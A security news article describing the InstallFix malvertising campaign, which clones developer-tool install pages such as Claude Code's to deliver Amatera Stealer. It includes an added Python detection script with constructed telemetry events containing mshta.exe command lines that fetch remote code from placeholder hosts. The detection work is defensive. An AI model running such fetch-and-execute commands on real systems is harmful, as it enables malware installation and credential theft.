A newly reported attack uses cloned web pages of popular development tools to distribute malware, according to Push Security. The variant, identified as InstallFix, is part of the broader ClickFix campaign and targets users by substituting genuine install commands with malicious ones on near-identical web pages.
Malvertising Tactics Exploited
The InstallFix campaign employs malvertising strategies to direct users to these deceptive yet convincing installation pages. A notable instance involves the abuse of interest in Anthropic’s Claude Code CLI tool. Threat actors have utilized Google Ads to increase the visibility of these cloned pages, ensuring they appear in sponsored search results, which significantly boosts their reach.
These counterfeit pages are crafted to replicate legitimate ones almost exactly. However, the install script embedded in these pages redirects users to an attacker-controlled server, which then deploys infostealing malware instead of the authentic Claude Code installation script.
Execution Chain and Malware Deployment
Upon executing the malicious installation command, the victim unknowingly triggers a sequence where cmd.exe launches mshta.exe. This process retrieves and executes malicious code from a remote server, culminating in the installation of the Amatera Stealer malware.
Push Security has observed that multiple sites are executing identical binaries, indicating a coordinated attack campaign. Legitimate hosting services such as Cloudflare Pages, Squarespace, and Tencent EdgeOne are being abused to host these malicious payloads, which lets them blend in with normal web traffic.
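The cmd.exe to mshta.exe chain described above can be hunted for in process-creation telemetry. The following is an added example, not code from Push Security or the original report: the events are constructed, the field names assume Sysmon Event ID 1 style logging, and the hosts use the reserved .invalid TLD.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Constructed process-creation events (Sysmon Event ID 1 style field names).
# None of these values come from the report.
EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://install.example.invalid/claude"},
    {"ParentImage": r"C:\WINDOWS\system32\CMD.EXE",
     "Image": r"C:\Windows\SysWOW64\MSHTA.EXE",
     "CommandLine": '"C:\\Windows\\SysWOW64\\mshta.exe" "http://cdn.example.invalid/a.hta"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Tools\inventory.hta"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Program Files\nodejs\node.exe",
     "CommandLine": "node.exe install.js https://registry.example.invalid/"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://pages.example.invalid/i"},
]

URL_RE = re.compile(r"https?://([^\s\"'/:]+)", re.IGNORECASE)

def find_remote_mshta(events):
    """Return one finding per mshta.exe launch whose command line names a URL."""
    findings = []
    for index, event in enumerate(events):
        image = basename(event.get("Image", "")).lower()
        if image != "mshta.exe":
            continue
        match = URL_RE.search(event.get("CommandLine", ""))
        if match is None:
            continue  # local .hta file: out of scope for this rule
        parent = basename(event.get("ParentImage", "")).lower()
        findings.append({
            "event": index,
            "host": match.group(1).lower(),
            # cmd.exe as parent matches the chain in the report; other
            # parents are still reported, at lower confidence.
            "confidence": "high" if parent == "cmd.exe" else "medium",
        })
    return findings

if __name__ == "__main__":
    for finding in find_remote_mshta(EVENTS):
        print(finding)
```

Because the payloads sit on legitimate hosting services, the extracted host is better used for triage and correlation than as a blocklist entry.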
Broader Implications for Development Tools
The campaign is not limited to Claude Code; any development tool or website that attracts many clicks and is easy to clone can become a target. Threat actors have been found hosting malicious terminal commands on vulnerable public pages, distributing malware through clones of the Homebrew website and rogue GitHub repositories, and using npm packages that mimic Claude Code.
Push Security emphasizes that this malvertising and impersonation tactic is a widespread issue, potentially affecting any tool or site that can be easily replicated. The cybersecurity community is urged to remain vigilant against such threats and ensure robust security measures are in place.
In related news, various cybersecurity threats continue to evolve, with attackers exploiting DNS lookups in ClickFix attacks, delivering infostealer malware via EmEditor supply chain attacks, and more. Staying informed and adopting proactive security strategies is crucial in combating these threats.
